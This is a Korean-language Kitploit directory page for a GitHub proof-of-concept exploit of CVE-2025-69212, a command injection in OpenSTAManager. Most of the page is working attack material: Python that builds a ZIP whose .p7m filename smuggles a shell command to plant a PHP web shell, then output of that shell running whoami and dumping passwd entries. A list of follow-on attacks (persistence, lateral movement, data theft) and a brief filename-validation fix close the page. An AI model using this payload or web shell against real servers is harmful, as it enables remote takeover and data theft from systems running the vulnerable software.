Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
OpenSTA-Exploit — P7M 파일 처리와 관련된 CVE-2025-69212의 개념 증명(PoC) | Kitploit
도구/GitHubGitHub/lolw0/opensta-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHublolw0/opensta-exploit

OpenSTA-Exploit

P7M 파일 처리와 관련된 CVE-2025-69212의 개념 증명(PoC)

저장소 보기
5일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

OpenSTA-Exploit

image

DataDetail
CVE IDCVE-2025-69212
Vuln Score치명적 (9.4)
CWE78: Improper Neutralization of Special Elements used in an OS Command
Affected VersionsOpenSTAManager <= 2.9.8
Attack vector악성 파일 이름이 포함된 .p7m 파일이 담긴 ZIP 파일 업로드
Auth필요
Impact서버에서 임의 시스템 명령 실행

익스플로잇 설명

  1. cmd 변수에 셸 명령을 저장합니다 (명령을 실행할 수 있는 PHP 코드가 포함된 SHELL.php 파일을 생성합니다).
  2. cmd 변수의 명령을 숨기는 특수하게 조작된 파일 이름을 구성하여 malicious_file 변수에 저장합니다.
  3. exploit.zip이라는 새 ZIP 파일을 생성하고 쓰기 모드로 엽니다.
  4. ZIP에 파일을 추가합니다. 해당 파일 이름은 malicious_file 변수입니다.
  5. 악성 파일 이름이 exec() 명령에 주입됩니다.

PoC (개념 증명)

1. 주입할 zip 파일 생성

root@kitploit:~
import zipfile
import time

print("Creating zip file...")
time.sleep(1)

cmd = "cd files && echo '<?php system($_GET[\"c\"]); ?>' > SHELL.php"
malicious_file = f'invoice.p7m";{cmd};echo ".p7m'

with zipfile.ZipFile('exploit.zip', 'w') as zf:
    zf.writestr(malicious_file, b"")

2. 파일 실행 및 업로드

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ python3 exploit.py
Creating zip file...
lolw0@sys:~/OpenSTA-Exploit$ ls
-rw-rw-r 2 lolw0 lolw0 281 Aug 10 22:36 exploit.zip
image

image

3. Exploit 실행 결과

명령 실행 후 XML 파싱 실패

root@kitploit:~
HTTP/1.1 500 Internal Server Error

"error":{
"type":"Exception",
"message":"Start tag expected, '<' not found\n",
"code":0,
"file":"\/var\/www\/html\/openstamanager\/src\/Util\/XML.php",
"line":51}

3. 검증 및 원격 코드 실행

root@kitploit:~
lolw0@sys:~/OpenSTA-Exploit$ curl "http://localhost:8080/files/SHELL.php?c=whoami"

www-data

lolw0@sys:~/OpenSTA-Exploit$ curl -s --get \ --data-urlencode 'c=getent passwd | grep -E "/home|/bin/bash|/bin/sh"' \
'http://localhost:8080/files/SHELL.php'

root:x:0:0:root:/root:/bin/bash
xxxx:x:1001:1001:,,,:/home/xxxx:/usr/sbin/nologin
yyyy:x:1002:1002:,,,:/home/yyyy:/usr/sbin/nologin
zzzz:x:1003:1003:,,,:/home/zzzz:/usr/sbin/nologin



이어질 수 있는 공격


수정 방법

**간단한 수정 방법은 처리 전에 파일 이름을 검증하는 것입니다 (영숫자, 점, 대시, 밑줄만 허용하여 잘못된 파일 이름은 건너뜁니다)

root@kitploit:~
foreach ($files_xml as $xml) {
    if (!preg_match('/^[a-zA-Z0-9._-]+$/', $xml)) {
        continue; 
    }
    if (string_ends_with($xml, '.p7m')) {
        $file = XML::decodeP7M($directory.'/'.$xml);
    }
}

(또는 그냥 업데이트하면 됩니다 lol)

도구 다운로드
AttackDetail
원격 코드 실행명령 실행을 통한 서버 전체 장악
데이터 유출모든 애플리케이션 데이터 및 데이터베이스 접근
권한 상승웹 서버가 상승된 권한으로 실행 중이거나 취약한 경우 잠재적 권한 상승 가능
지속성 유지백도어 설치 및 지속적인 접근 유지
수평적 이동네트워크 내 다른 시스템/사용자로 이동